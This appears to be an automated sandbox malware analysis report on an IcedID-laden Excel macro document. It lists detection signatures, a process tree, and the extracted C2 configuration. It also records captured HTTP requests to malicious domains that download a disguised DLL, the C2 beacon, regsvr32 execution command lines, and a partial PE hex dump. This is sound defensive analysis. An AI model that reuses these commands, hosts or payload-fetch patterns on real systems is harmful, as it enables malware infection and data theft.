Play interactive tour

Edit tour

Windows Analysis Report Schedule-982347-Y6844315.xlsm

Overview

General Information

Sample Name:	Schedule-982347-Y6844315.xlsm
Analysis ID:	444774
MD5:	e0d3214ff37a8a28babb83c90db540e8
SHA1:	ceefb39c44d9b761d548722d87985c524a9584ff
SHA256:	b7c18213b34bb408434dbfd34b2719b17193ce695819d8b798454d38010ccc89
Tags:	IcedIDxlsm
Infos:
Most interesting Screenshot:

Detection

IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected IcedID

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect virtualization through RDTSC time measurements

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query network adapater information

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2740 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 3052 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2076 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2356 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security
00000004.00000002.2089712522.0000000000110000.00000004.00000001.sdmp	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com
00000004.00000002.2089784049.00000000003B6000.00000004.00000020.sdmp	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security
Process Memory Space: regsvr32.exe PID: 2076	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.regsvr32.exe.110000.0.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x1bc6:$internal_name: loader_dll_64.dll 0x1f16:$string6: WINHTTP.dll 0x1bea:$string7: DllRegisterServer 0x1bfc:$string8: PluginInit
4.2.regsvr32.exe.110000.0.raw.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com
4.2.regsvr32.exe.510000.1.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30bc:$string0: _gat= 0x311c:$string1: _ga= 0x30f4:$string2: _gid= 0x30d4:$string3: _u= 0x302e:$string4: _io= 0x30e0:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3088:$string9: POST 0x3148:$string10: aws.amazon.com

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2740, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 3052

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.110000.0.raw.unpack

Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2089768444.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2089784049.00000000003B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2076, type: MEMORY

Source: unknown

HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: lsdfik[1].fml.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Source: global traffic

DNS query: name: thousandsyears.download

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 13.224.92.73:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.21.52.111:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: astrocycle.download

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 15:07:16 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4244Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=o1t60Q0Ft8jw%2BbLjpGzVHU1bm7lVN8wCMuOkpMc4Ff0%2Bi9DppJHkfdNcsUMepKim4lAeOdK7XhOgiYZd8RME5%2FV39JcmWlBpzVUcVCNTvvOFsudwXMUpnZ0eXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9bde1ea474e2b-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5223:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373435343831:416C627573:36333131444230364634373530414536; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: Joe Sandbox View	IP Address: 13.224.92.73 13.224.92.73
Source: Joe Sandbox View	IP Address: 104.21.37.209 104.21.37.209
Source: Joe Sandbox View	IP Address: 172.67.146.88 172.67.146.88

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1033902.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5223:56; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373435343831:416C627573:36333131444230364634373530414536; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000002.2093713689.0000000003389000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Q1PJ39CK1DRS268C8DS3X-Content-Type-OptionsnosniffX-XSS-Protection1; mode=blockX-Frame-OptionsSAMEORIGINx-amz-ridQ1PJ39CK1DRS268C8DS3Persistent-AuthWWW-Authenticateaccept-encoding,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-AgentVaryaws_lang=en; Domain=.amazon.com; Path=/aws-csds-token=eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjU1ODc2MzgsInZpc2l0b3ItaWQiOiI0MmJkM2UyZC1mODgwLTFiNDAtYmMxYy0yZjU5ZThjZmU3ZTAiLCJpcCI6Ijg0LjE3LjUyLjkifQ.WHRboVDdY6OExtqaF1yDFvIWmUXDqfW82XRt338zQIA; Version=1; Comment="Anonymous metrics validation token"; Domain=.amazon.com; Max-Age=900; Expires=Tue, 06-Jul-2021 15:22:18 GMT; Path=/aws-priv=eyJ2IjoxLCJldSI6MCwic3QiOjB9; Version=1; Comment="Anonymous cookie for privacy regulations"; Domain=.aws.amazon.com; Max-Age=31536000; Expires=Wed, 06-Jul-2022 15:07:18 GMT; Path=/Set-CookieServerServerRetry-AfterPr
Source: regsvr32.exe, 00000004.00000003.2086174655.000000000337B000.00000004.00000001.sdmp	String found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Q1PJ39CK1DRS268C8DS3X-Content-Type-OptionsnosniffX-XSS-Protection1; mode=blockX-Frame-OptionsSAMEORIGINx-amz-ridQ1PJ39CK1DRS268C8DS3Persistent-AuthWWW-Authenticateaccept-encoding,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-AgentVaryaws_lang=en; Domain=.amazon.com; Path=/aws-csds-token=eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjU1ODc2MzgsInZpc2l0b3ItaWQiOiI0MmJkM2UyZC1mODgwLTFiNDAtYmMxYy0yZjU5ZThjZmU3ZTAiLCJpcCI6Ijg0LjE3LjUyLjkifQ.WHRboVDdY6OExtqaF1yDFvIWmUXDqfW82XRt338zQIA; Version=1; Comment="Anonymous metrics validation token"; Domain=.amazon.com; Max-Age=900; Expires=Tue, 06-Jul-2021 15:22:18 GMT; Path=/aws-priv=eyJ2IjoxLCJldSI6MCwic3QiOjB9; Version=1; Comment="Anonymous cookie for privacy regulations"; Domain=.aws.amazon.com; Max-Age=31536000; Expires=Wed, 06-Jul-2022 15:07:18 GMT; Path=/Set-CookieServerServerRetry-AfterPr
Source: regsvr32.exe, 00000004.00000002.2091334487.0000000002F90000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000003.2086195402.00000000003B6000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: thousandsyears.download

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 15:07:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Yj3elqj3Z0Xg0OIJCU%2BdOkJ2AxD9QT8Qrpl6gGiIG2Gf8JJNYHAO6EtGngIMkSOCWxORErzhgsKnmluqAuuaHRSpGmTjNDtgehRgmFZvbeBrue66WhdmYLezeLjqnWhcJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9bdf2fe32c2f4-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 